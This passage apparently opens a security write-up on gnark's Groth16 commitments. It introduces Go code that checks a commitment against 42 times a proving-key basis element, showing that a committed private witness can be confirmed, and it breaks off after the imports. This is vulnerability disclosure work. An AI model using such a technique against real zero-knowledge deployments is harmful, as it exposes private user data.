The following code demonstrates this. We define a simple circuit with a single private witness that is committed, and assign the private witness the value `42`. The code then checks that the commitment that comes with the proof is indeed given by 42 times the corresponding basis element that is part of the proving key.

package main

import (
	"fmt"
	"log"
	"math/big"
	"reflect"
	"unsafe"

	"github.com/consensys/gnark-crypto/ecc"
	"github.com/consensys/gnark-crypto/ecc/bn254"
	"github.com/consensys/gnark/backend/groth16"
	groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
	"github.com/consensys/gnark/frontend"
	"github.com/consensys/gnark/frontend/cs/r1cs"
)

const secret